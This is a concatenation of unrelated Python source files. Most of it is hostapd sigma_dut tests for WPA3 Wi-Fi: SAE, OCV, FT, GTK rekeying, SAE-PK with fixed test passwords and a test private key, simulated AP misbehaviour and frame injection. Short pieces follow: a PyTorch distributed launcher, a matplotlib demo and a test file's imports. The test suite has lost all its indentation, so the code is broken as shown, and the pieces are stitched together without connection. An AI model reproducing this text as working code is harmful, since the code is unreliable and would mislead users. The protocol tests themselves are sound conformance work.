if ev.split(' ')[1] != "01":
raise Exception("Unexpected transition disable bitmap: " + ev)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_transition_disable_change(dev, apdev, params):
"""sigma_dut controlled AP and transition disabled indication change"""
check_sae_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
ev = dev[0].wait_event(["TRANSITION-DISABLE"], timeout=1)
if ev is not None:
raise Exception("Unexpected transition disable indication")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,Transition_Disable,1,Transition_Disable_Index,0")
dev[0].request("RECONNECT")
dev[0].wait_connected()
ev = dev[0].wait_event(["TRANSITION-DISABLE"], timeout=1)
if ev is None:
raise Exception("Transition disable not indicated")
if ev.split(' ')[1] != "01":
raise Exception("Unexpected transition disable bitmap: " + ev)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ft_rsnxe_used_mismatch(dev, apdev):
"""sigma_dut controlled FT protocol with RSNXE Used mismatch"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE FT-SAE'
params["ieee80211w"] = "2"
params['sae_password'] = "hello"
params['sae_pwe'] = "2"
params['mobility_domain'] = 'aabb'
bssid = apdev[0]['bssid'].replace(':', '')
params['nas_identifier'] = bssid + '.nas.example.com'
params['r1_key_holder'] = bssid
params['pmk_r1_push'] = '0'
params['r0kh'] = 'ff:ff:ff:ff:ff:ff * 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
params['r1kh'] = '00:00:00:00:00:00 00:00:00:00:00:00 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9" % (ifname, "test-sae", "hello"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
dev[0].dump_monitor()
bssid2 = apdev[1]['bssid'].replace(':', '')
params['nas_identifier'] = bssid2 + '.nas.example.com'
params['r1_key_holder'] = bssid2
hapd2 = hostapd.add_ap(apdev[1], params)
bssid2 = hapd2.own_addr()
sigma_dut_cmd_check("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid2))
count = 0
for i in range(5):
ev = dev[0].wait_event(["Trying to associate",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Connection timed out")
if "CTRL-EVENT-CONNECTED" in ev:
break
count += 1
dev[0].dump_monitor()
if count != 1:
raise Exception("Unexpected number of association attempts for the first FT protocol exchange (expecting success)")
sigma_dut_cmd_check("sta_set_rfeature,interface,%s,prog,WPA3,ReassocReq_RSNXE_Used,1" % ifname)
sigma_dut_cmd_check("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
count = 0
for i in range(5):
ev = dev[0].wait_event(["Trying to associate",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Connection timed out")
if "CTRL-EVENT-CONNECTED" in ev:
break
count += 1
dev[0].dump_monitor()
if count != 2:
raise Exception("Unexpected number of association attempts for the second FT protocol exchange (expecting failure)")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_rsnxe_used_mismatch(dev, apdev, params):
"""sigma_dut controlled AP with FT and RSNXE Used mismatch"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng,DOMAIN,aabb")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8;9,SAEPasswords,hello,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="FT-SAE", sae_password="hello",
ieee80211w="2", scan_freq="2412")
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,type,WPA3,ReassocResp_RSNXE_Used,1")
# This would need to be followed by FT protocol roaming test, but
# that is not currently convenient to implement, so for now, this
# test is based on manual inspection of hostapd getting configured
# properly.
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ocv(dev, apdev):
"""sigma_dut controlled STA using OCV"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
params['ocv'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_rfeature,interface,%s,prog,WPA3,OCIFrameType,eapolM2,OCIChannel,11" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
ev = hapd.wait_event(["OCV-FAILURE"], timeout=1)
if ev is None:
raise Exception("OCV failure for EAPOL-Key msg 2/4 not reported")
if "addr=" + dev[0].own_addr() not in ev:
raise Exception("Unexpected OCV failure addr: " + ev)
if "frame=eapol-key-m2" not in ev:
raise Exception("Unexpected OCV failure frame: " + ev)
if "error=primary channel mismatch" not in ev:
raise Exception("Unexpected OCV failure error: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ocv(dev, apdev, params):
"""sigma_dut controlled AP using OCV"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,ocvc,1")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", ocv="1", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,type,WPA3,OCIFrameType,eapolM3,OCIChannel,3")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", ocv="1", scan_freq="2412",
wait_connect=False)
check_ocv_failure(dev[0], "EAPOL-Key msg 3/4", "eapol-key-m3",
bssid)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_gtk_rekey(dev, apdev):
"""sigma_dut controlled STA requesting GTK rekeying"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("dev_exec_action,interface,%s,program,WPA3,KeyRotation,1" % ifname)
ev = dev[0].wait_event(["WPA: Group rekeying completed"], timeout=5)
if ev is None:
raise Exception("GTK rekeying not seen")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_gtk_rekey(dev, apdev, params):
"""sigma_dut controlled AP and requested GTK rekeying"""
logdir = params['prefix'] + ".sigma-hostapd"
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].dump_monitor()
sigma_dut_cmd_check("dev_exec_action,name,AP,interface,%s,program,WPA3,KeyRotation,1" % iface)
ev = dev[0].wait_event(["WPA: Group rekeying completed"], timeout=5)
if ev is None:
raise Exception("GTK rekeying not seen")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pk(dev, apdev):
"""sigma_dut controlled STA using SAE-PK"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "SAE-PK test"
pw = "hbbi-f4xq-b45g"
m = "d2e5fa27d1be8897f987f2d480d2af6b"
pk = "MHcCAQEEIAJIGlfnteonDb7rQyP/SGQjwzrZAnfrXIm4280VWajYoAoGCCqGSM49AwEHoUQDQgAEeRkstKQV+FSAMqBayqFknn2nAQsdsh/MhdX6tiHOTAFin/sUMFRMyspPtIu7YvlKdsexhI0jPVhaYZn1jKWhZg=="
try:
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
params['sae_password'] = ['%s|pk=%s:%s' % (pw, m, pk)]
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,sae_pk,1" % (ifname, ssid, pw))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_ap_sae_pk(conffile, dev, ssid, pw, keypair, m, failure,
status=None, omit=False, immediate=False, sig=None):
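    # Optional arguments map to the ap_set_security fields added below:
    #   status    - SAE_Commit_StatusCode override
    #   omit      - SAE_PK_Omit (omit the SAE-PK element)
    #   immediate - SAE_Confirm_Immediate
    #   sig       - SAE_PK_KeyPairSigOverride (key pair used for the signature)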
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,%s,MODE,11ng" % ssid)
cmd = "ap_set_security,NAME,AP,AKMSuiteType,8,PairwiseCipher,AES-CCMP-128,GroupCipher,AES-CCMP-128,GroupMgntCipher,BIP-CMAC-128,PMF,Required,PSK,%s,sae_pk,1,Transition_Disable,1,Transition_Disable_Index,0,SAE_PK_KeyPair,%s,SAE_PK_Modifier,%s" % (pw, keypair, m)
if status is not None:
cmd += ",SAE_Commit_StatusCode,%d" % status
if omit:
cmd += ",SAE_PK_Omit,1"
if immediate:
cmd += ",SAE_Confirm_Immediate,1"
if sig:
cmd += ",SAE_PK_KeyPairSigOverride," + sig
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "ab") as f2:
f2.write(f.read())
f2.write('\n'.encode())
dev.set("sae_groups", "")
dev.connect(ssid, key_mgmt="SAE", sae_password=pw, ieee80211w="2",
scan_freq="2412", wait_connect=False)
ev = dev.wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=15)
if ev is None:
raise Exception("No connection result reported")
bss = dev.get_bss(bssid)
if 'flags' not in bss:
raise Exception("Could not get BSS flags from BSS table")
if "[SAE-H2E]" not in bss['flags'] or "[SAE-PK]" not in bss['flags']:
raise Exception("Unexpected BSS flags: " + bss['flags'])
if failure:
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
dev.request("REMOVE_NETWORK all")
else:
if "CTRL-EVENT-CONNECTED" not in ev:
raise Exception("Connection failed")
dev.request("REMOVE_NETWORK all")
dev.wait_disconnected()
dev.dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_sae_pk(dev, apdev, params):
"""sigma_dut controlled AP using SAE-PK"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
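    # Test vectors: (ssid, password, AP key pair file, SAE-PK modifier,
    # expect-failure); when the last element is True the STA is expected to
    # reject the connection (see run_sigma_dut_ap_sae_pk()).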
tests = [("SAEPK-4.7.1.1", "ya3o-zvm2-r4so", "saepk1.pem",
"faa1ef5094bdb4cb2836332ca2c09839", False),
("SAEPK-4.7.1.2", "xcc2-qwru-yg23", "saepk1.pem",
"b1b30107eb74de2f25afd079bb4196c1", False),
("SAEPK-4.7.1.3", "skqz-6scq-zcqv", "saepk1.pem",
"4c0ff61465e0f298510254ff54916c71", False),
("SAEPK-4.7.1.4", "r6em-rya4-tqfa", "saepkP384.pem",
"fb811655209e9edf347a675ddd3e9c82", False),
("SAEPK-4.7.1.5", "6kjo-umvi-7x3w", "saepkP521.pem",
"cccb76bc0f113ab754826ba9538d66f5", False),
("SAEPK-5.7.1.1", "sw4h-re63-wgqg", "saepk1.pem",
"0d126f302d85ac809a6a4229dbbe3c75", False),
("SAEPK-5.7.1.2", "wewq-r4kg-4ioz-xb2p", "saepk1.pem",
"d6b1d8924b1a462677e67b3bbfe73977", False),
("SAEPK-5.7.1.3", "vb3v-5skk-5eft-v4hu-w2c5", "saepk1.pem",
"41f8cfceb96ebc5c8af9677d22749fad", False),
("SAEPK-5.7.1.4", "2qsw-6tgy-xnwa-s7lo-75tq-qggr", "saepk1.pem",
"089e8d4a3a79ec637c54dd7bd61972f2", False),
("SAE-PK test", "hbbi-f4xq-b45g", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAE-PK test", "hbbi-f4xq-b457-jje4", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAE-PK test", "hbbi-f4xq-b457-jjew-muei", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAE-PK test", "hbbi-f4xq-b457-jjew-muey-fod3", "saepkP256.pem",
"d2e5fa27d1be8897f987f2d480d2af6b", False),
("SAEPK-5.7.1.1", "sw4h-re63-wgqg", "saepk1.pem",
"0d126f302d85ac809a6a4229dbbe3c75", False),
("SAEPK-5.7.1.10", "tkor-7nb3-r7tv", "saepkP384.pem",
"af1a3df913fc0103f65f105ed1472277", False),
("SAEPK-5.7.1.11", "yjl3-vfvu-w6r3", "saepkP521.pem",
"24dadf9d253c4169c9647a21cb54fc57", False),
("SAEPK-5.7.2.1", "rntm-tkrp-xgke", "saepk1.pem",
"cd38ccce3baff627d09bee7b9530d6ce", False),
("SAEPK-5.7.2.2", "7lt7-7dqt-6abk", "saepk1.pem",
"a22fc8489932597c9e83de62dec02b21", False),
("SAEPK-5.7.2.3", "sw4h-re63-wgqg", "saepk2.pem",
"1f4a4c7d290d97e0b6ab0cbbbfa0726d", True),
("SAEPK-5.7.2.4", "rmj3-ya7b-42k4", "saepk1.pem",
"5f65e2bc37f8494de7a605ff615c8b6a", False),
("SAEPK-5.7.2.4", "rmj3-ya7b-42k4", "saepk2.pem",
"5f65e2bc37f8494de7a605ff615c8b6a", True),
("SAEPK-5.7.3", "4322-ufus-4bhm", "saepk1.pem",
"21ede99abc46679646693cafe4677d4e", False)]
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
for ssid, pw, keypair, m, failure in tests:
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
failure)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pk_misbehavior(dev, apdev, params):
"""sigma_dut controlled AP using SAE-PK misbehavior"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
ssid = "SAEPK-4.7.1.1"
pw = "rmj3-ya7b-42k4"
keypair = "saepk1.pem"
m = "faa1ef5094bdb4cb2836332ca2c09839"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, status=126)
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, omit=True)
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, status=126, omit=True, immediate=True)
run_sigma_dut_ap_sae_pk(conffile, dev[0], ssid, pw, keypair, m,
True, sig="saepk2.pem")
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_ap_sae_pk_mixed(conffile, dev, ssid, pw, keypair, m, failure):
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,%s,MODE,11ng" % ssid)
cmd = "ap_set_security,NAME,AP,AKMSuiteType,2;8,PairwiseCipher,AES-CCMP-128,GroupCipher,AES-CCMP-128,GroupMgntCipher,BIP-CMAC-128,PMF,Required,PSK,%s,sae_pk,0,Transition_Disable,0" % (pw)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "ab") as f2:
f2.write(f.read())
f2.write('\n'.encode())
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,type,WPA3,Transition_Disable,1,Transition_Disable_Index,0")
dev[0].set("sae_groups", "")
dev[0].connect(ssid, key_mgmt="SAE", sae_password=pw, ieee80211w="2",
scan_freq="2412")
dev[1].connect(ssid, key_mgmt="WPA-PSK", psk=pw, ieee80211w="2",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_sae_pk_mixed(dev, apdev, params):
"""sigma_dut controlled AP using SAE-PK(disabled) and PSK"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
ssid = "SAEPK-5.7.3"
pw = "4322-ufus-4bhm"
keypair = "saepk1.pem"
m = "21ede99abc46679646693cafe4677d4e"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_sae_pk_mixed(conffile, dev, ssid, pw, keypair,
m, False)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_client_privacy(dev, apdev, params):
"""sigma_dut client privacy"""
logdir = params['logdir']
ssid = "test"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
addr = dev[0].own_addr()
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ClientPrivacy,1" % ifname)
cmd = "sta_scan,Interface,%s,ChnlFreq,2412,WaitCompletion,1" % dev[0].ifname
sigma_dut_cmd_check(cmd, timeout=10)
time.sleep(2)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, ssid, "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
dev[0].set("mac_addr", "0", allow_fail=True)
dev[0].set("rand_addr_lifetime", "60", allow_fail=True)
dev[0].request("MAC_RAND_SCAN enable=0 all")
dev[0].set("preassoc_mac_addr", "0", allow_fail=True)
dev[0].set("gas_rand_mac_addr", "0", allow_fail=True)
dev[0].set("gas_rand_addr_lifetime", "60", allow_fail=True)
out = run_tshark(os.path.join(logdir, "hwsim0.pcapng"),
"wlan.addr == " + addr,
display=["wlan.ta"])
res = out.splitlines()
if len(res) > 0:
raise Exception("Permanent address used unexpectedly")
def test_sigma_dut_wpa3_inject_frame(dev, apdev):
"""sigma_dut and WPA3 frame inject"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params["ocv"] = "1"
params['sae_groups'] = '19 20 21'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_wireless,interface,%s,program,WPA3,ocvc,1" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd("dev_send_frame,interface,%s,program,WPA3,framename,SAQueryReq,OCIChannel,2" % ifname)
sigma_dut_cmd("dev_send_frame,interface,%s,program,WPA3,framename,SAQueryReq,OCIChannel,1" % ifname)
sigma_dut_cmd("dev_send_frame,interface,%s,program,WPA3,framename,ReassocReq" % ifname)
hwsim_utils.test_connectivity(dev[0], hapd)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
|
distributed.py
|
import os
import sys
current_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(root_path)
import signal
import threading
import torch
import experiments.options as options
from experiments.train import main as single_process_main
def main():
args = options.parse_distributed_args()
args_dict = vars(args)
nproc_per_node = args_dict.pop('nproc_per_node')
nnodes = args_dict.pop('nnodes')
node_rank = args_dict.pop('node_rank')
# world size in terms of number of processes
dist_world_size = nproc_per_node * nnodes
# set PyTorch distributed related environmental variables
current_env = os.environ
current_env["MASTER_ADDR"] = args_dict.pop('master_addr')
current_env["MASTER_PORT"] = str(args_dict.pop('master_port'))
current_env["WORLD_SIZE"] = str(dist_world_size)
batch_size = args.batch_size // dist_world_size
args.batch_size = batch_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
processes = []
for local_rank in range(0, nproc_per_node):
# each process's rank
dist_rank = nproc_per_node * node_rank + local_rank
args.rank = dist_rank
args.local_rank = local_rank
process = mp.Process(target=run, args=(args, error_queue, ), daemon=False)
process.start()
error_handler.add_child(process.pid)
processes.append(process)
for process in processes:
process.join()
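# Example multi-node launch (hypothetical flag spellings, inferred from the
# argument names popped from parse_distributed_args() above):
#   python distributed.py --nproc_per_node 4 --nnodes 2 --node_rank 0 \
#       --master_addr 192.0.2.1 --master_port 29500 <training args>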
def run(args, error_queue):
try:
single_process_main(args)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.rank, traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(target=self.error_listener, daemon=True)
self.error_thread.start()
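        # SIGUSR1 is the notification channel: error_listener() raises it in
        # this (parent) process once a child reports an error, and
        # signal_handler() then stops the children and re-raises the traceback.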
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
self.children_pids.append(pid)
def error_listener(self):
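        # block until any child reports an error, put it back on the queue for
        # the signal handler, and notify the main thread via SIGUSR1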
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = "\n\n-- Tracebacks above this line can probably be ignored --\n\n"
msg += original_trace
raise Exception(msg)
if __name__ == "__main__":
main()
|
draw_device_test.py
|
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import threading
from time import sleep
count = 0
def wrapper():
global count
while True:
print(count)
count += 1
sleep(1)
def main():
    read_thread = threading.Thread(target=wrapper, daemon=True)
read_thread.start()
plt.figure()
plt.axis([0, 10, 0, 10])
while True:
plt.cla()
        plt.scatter(count, count, color='k', label='count')
plt.legend(loc=4)
plt.pause(0.05)
# fig = plt.figure()
# #creating a subplot
# ax1 = fig.add_subplot(1,1,1)
# ax1.set_ylim(0, 60)
# def animate(i,ax1):
# ax1.clear()
# ax1.plot([0,i,2*i],[20,40,60])
# plt.xlabel('time')
# plt.ylabel('temperature')
# plt.title('plot')
# animation.FuncAnimation(fig, animate, fargs=(ax1), interval=1000)
# animate(1)
plt.show()
if __name__ == '__main__':
main()
|
test_sub.py
|
from common.base import GenericTestBase
from tcutils.wrappers import preposttest_wrapper
import test
from heat_test import HeatStackFixture
from nova_test import *
from vm_test import *
from jinja2 import Environment, FileSystemLoader
import yaml
